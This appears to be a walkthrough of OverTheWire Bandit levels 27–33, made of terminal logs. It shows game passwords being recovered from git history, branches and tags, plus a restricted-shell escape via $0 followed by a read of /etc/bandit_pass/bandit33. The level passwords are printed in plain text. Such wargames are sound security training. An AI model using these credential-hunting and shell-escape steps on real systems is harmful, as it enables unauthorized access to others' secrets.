bandit27@bandit:/tmp/evo2$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit27/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit27-git@localhost's password: 
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/evo2$ ls
repo
bandit27@bandit:/tmp/evo2$ cd repo
bandit27@bandit:/tmp/evo2/repo$ ll
total 16
drwxrwxr-x 3 bandit27 bandit27 4096 Mar 25 09:08 ./
drwxrwxr-x 3 bandit27 bandit27 4096 Mar 25 09:07 ../
drwxrwxr-x 8 bandit27 bandit27 4096 Mar 25 09:08 .git/
-rw-rw-r-- 1 bandit27 bandit27   68 Mar 25 09:08 README
bandit27@bandit:/tmp/evo2/repo$ cat README 
The password to the next level is: AVanL161y9rsbcJIsFHuw35rjaOM19nR

Level 28 → Level 29

bandit28@bandit:~$ cd /tmp
bandit28@bandit:/tmp$ mkdir evo128
bandit28@bandit:/tmp$ cd evo128
bandit28@bandit:/tmp/evo128$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit28/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       

                      This is an OverTheWire game server. 
            More information on http://www.overthewire.org/wargames

bandit28-git@localhost's password: 
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
bandit28@bandit:/tmp/evo128$ ls
repo
bandit28@bandit:/tmp/evo128$ cd repo
bandit28@bandit:/tmp/evo128/repo$ ll
total 16
drwxrwxr-x 3 bandit28 bandit28 4096 Mar 25 09:13 ./
drwxrwxr-x 3 bandit28 bandit28 4096 Mar 25 09:13 ../
drwxrwxr-x 8 bandit28 bandit28 4096 Mar 25 09:13 .git/
-rw-rw-r-- 1 bandit28 bandit28  111 Mar 25 09:13 README.md
bandit28@bandit:/tmp/evo128/repo$ cat README.md 
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

bandit28@bandit:/tmp/evo128/repo$ git show
commit 14f754b3ba6531a2b89df6ccae6446e8969a41f3 (HEAD -> master, origin/master, origin/HEAD)
Author: Morla Porla <morla@overthewire.org>
Date:   Thu Oct 5 06:19:41 2023 +0000

    fix info leak

diff --git a/README.md b/README.md
index b302105..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
 ## credentials
 
 - username: bandit29
-- password: tQKvmcwNYcFS6vmPHIUSI3ShmsrQZK8S
+- password: xxxxxxxxxx

Level 29 → Level 30

bandit29@bandit:~$ cd /tmp
bandit29@bandit:/tmp$ mkdir evo129
bandit29@bandit:/tmp$ cd evo129
bandit29@bandit:/tmp/evo129$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repo
bandit29@bandit:/tmp/evo129$ cd repo
bandit29@bandit:/tmp/evo129/repo$ ls
README.md
bandit29@bandit:/tmp/evo129/repo$ cat README.md 
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

bandit29@bandit:/tmp/evo129/repo$ git branch -a
* master
  remotes/origin/HEAD -> origin/master
  remotes/origin/dev
  remotes/origin/master
  remotes/origin/sploits-dev
bandit29@bandit:/tmp/evo129/repo$ git checkout dev
Branch 'dev' set up to track remote branch 'dev' from 'origin'.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/evo129/repo$ ls
code  README.md
bandit29@bandit:/tmp/evo129/repo$ cat README.md 
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: xbhV3HpNGlTIdnjUrdAlPzc2L6y9EOnS

Level 30 → Level 31

bandit30@bandit:~$ cd /tmp
bandit30@bandit:/tmp$ mkdir evo130
bandit30@bandit:/tmp$ cd evo130
bandit30@bandit:/tmp/evo130$ git clone ssh://bandit30-git@localhost:2220/home/bandit30-git/repo
bandit30@bandit:/tmp/evo130$ ls
repo
bandit30@bandit:/tmp/evo130$ cd repo
bandit30@bandit:/tmp/evo130/repo$ ls
README.md
bandit30@bandit:/tmp/evo130/repo$ cat README.md 
just an epmty file... muahaha
bandit30@bandit:/tmp/evo130/repo$ git show-ref
d39631d73f786269b895ae9a7b14760cbf40a99f refs/heads/master
d39631d73f786269b895ae9a7b14760cbf40a99f refs/remotes/origin/HEAD
d39631d73f786269b895ae9a7b14760cbf40a99f refs/remotes/origin/master
831aac2e2341f009e40e46392a4f5dd318483019 refs/tags/secret
bandit30@bandit:/tmp/evo130/repo$ git show 831a
OoffzGDlzhAlerFJ2cAiz1D41JW1Mhmt

Level 31 → Level 32

bandit31@bandit:~$ cd /tmp
bandit31@bandit:/tmp$ mkdir evo131
bandit31@bandit:/tmp$ cd evo131
bandit31@bandit:/tmp/evo131$ git clone ssh://bandit31-git@localhost:2220/home/bandit31-git/repo
bandit31@bandit:/tmp/evo131$ cd repo
bandit31@bandit:/tmp/evo131/repo$ ls
README.md
bandit31@bandit:/tmp/evo131/repo$ cat README.md 
This time your task is to push a file to the remote repository.

Details:
    File name: key.txt
    Content: 'May I come in?'
    Branch: master

bandit31@bandit:/tmp/evo131/repo$ echo "May I come in?" > key.txt
bandit31@bandit:/tmp/evo131/repo$ git add -f key.txt 
bandit31@bandit:/tmp/evo131/repo$ git status
On branch master
Your branch is up to date with 'origin/master'.

Changes to be committed:
  (use "git restore --staged <file>..." to unstage)
	new file:   key.txt

bandit31@bandit:/tmp/evo131/repo$ git commit -m "key.txt"
[master 5d3806a] key.txt
 1 file changed, 1 insertion(+)
 create mode 100644 key.txt
bandit31@bandit:/tmp/evo131/repo$ git push origin master
kex_exchange_identification: Connection closed by remote host
Connection closed by 127.0.0.1 port 2220
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
bandit31@bandit:/tmp/evo131/repo$ git push origin master
......
remote: Well done! Here is the password for the next level:
remote: rmCBvG56y58BXzv98yZGdO7ATVL5dW8y
......

Level 32 → Level 33

WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
odHo63fHiFqcWWJG9rLiLDtPm45KzUKy

Level 33 → Level 34

At this moment, level 34 does not exist yet.